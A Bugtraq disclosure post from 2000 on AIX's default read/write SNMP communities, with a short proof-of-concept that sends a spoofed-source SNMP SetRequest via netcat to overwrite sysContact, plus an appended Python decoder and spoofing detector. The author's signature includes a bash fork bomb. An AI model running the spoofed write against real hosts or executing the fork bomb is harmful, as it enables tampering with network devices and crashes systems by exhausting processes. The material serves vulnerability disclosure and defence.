[13904] in bugtraq
Re: AIX SNMP Defaults
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Fri Feb 18 00:43:39 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.21.0002171122280.28680-100000@dione.ids.pl>
Date: Thu, 17 Feb 2000 11:28:54 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To: harikiri <harikiri@ATTRITION.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.BSO.4.10.10002151819130.9777-100000@shaolin.fcbl.net>
On Tue, 15 Feb 2000, harikiri wrote:
> It appears that on the above releases of AIX, the SNMP daemon is
> enabled by default and two community names are enabled with read/write
> privileges. The community names are "private" and "system", but are
> only allowed from localhost connections. Nevertheless, a local user
> may install an SNMP client, and modify sensitive variables.
SNMP requests with no authentication except for source-IP comparison are
spoofable.
--snip--
#!/bin/bash
# Emits one SNMPv1 SetRequest (community "private") that writes the string
# "null" into sysContact.0 (1.3.6.1.2.1.1.4.0); the bytes are BER-encoded.
cat >/tmp/spoof1.c <<_EOF_
#include <unistd.h>
char
private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
"\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
/* sizeof() counts the terminating NUL, which is not part of the packet */
int main(void) { write(1,private,sizeof(private)-1); return 0; }
_EOF_
gcc -o /tmp/spoof1 /tmp/spoof1.c
/tmp/spoof1 | nc -s FakeSourceIPHere -u RemoteIPHere 161
--snip--
UDP blind spoofing, nothing easier.
_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
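An added example, not part of Michal's post and not AIX code: a minimal SNMPv1 BER decoder run over the exact SetRequest bytes the script above emits, plus the defender-side check the thread implies, flagging a SetRequest whose claimed source address is loopback but which arrived on a non-loopback interface (a packet that can only exist if the source was spoofed). The interface names and the per-packet source IP and ingress interface are assumptions supplied by the caller.

```python
import ipaddress
# Packet bytes from the post (C octal escapes written as hex). Decoder added here.
PACKET = (b"\x30\x82\x00\x2d\x02\x01\x00\x04\x07private\xa3\x1f"
          b"\x02\x01\x01\x02\x01\x00\x02\x01\x00\x30\x14\x30\x82\x00\x10"
          b"\x06\x08\x2b\x06\x01\x02\x01\x01\x04\x00\x04\x04null")
PDU_NAMES = {0xa0: "GetRequest", 0xa1: "GetNextRequest", 0xa3: "SetRequest"}
LOOPBACK_IFACES = {"lo", "lo0"}      # assumed loopback interface names

def read_tlv(buf, pos):              # one BER TLV -> (tag, contents, next position)
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                # long form: 0x8N followed by N length bytes
        n = length & 0x7f
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):                 # BER OID content octets -> dotted string
    ids, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7f)   # base-128, high bit set means "more"
        if not b & 0x80:
            ids.append(val)
            val = 0
    return ".".join(map(str, ids))

def parse_snmpv1(packet):
    """Return version, community, PDU type and varbinds of an SNMPv1 message."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, p = read_tlv(msg, 0)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    p = 0
    for _ in range(3):               # skip request-id, error-status, error-index
        _, _, p = read_tlv(pdu, p)
    _, vbl, _ = read_tlv(pdu, p)     # VarBindList
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = read_tlv(vbl, p)
        _, oid, q = read_tlv(vb, 0)
        _, value, _ = read_tlv(vb, q)
        varbinds.append((decode_oid(oid), value))
    return {"version": int.from_bytes(version, "big"), "community": community.decode(),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "varbinds": varbinds}

def spoofed_localhost_set(packet, src_ip, iface):
    """True if a SetRequest claims a loopback source yet arrived on a non-loopback interface."""
    msg = parse_snmpv1(packet)
    return (msg["pdu"] == "SetRequest" and iface not in LOOPBACK_IFACES
            and ipaddress.ip_address(src_ip).is_loopback)
```

The same check expressed on the network edge is ingress filtering that drops packets with a loopback or internal source address arriving from outside, which is what closes the gap the source-IP community restriction leaves open.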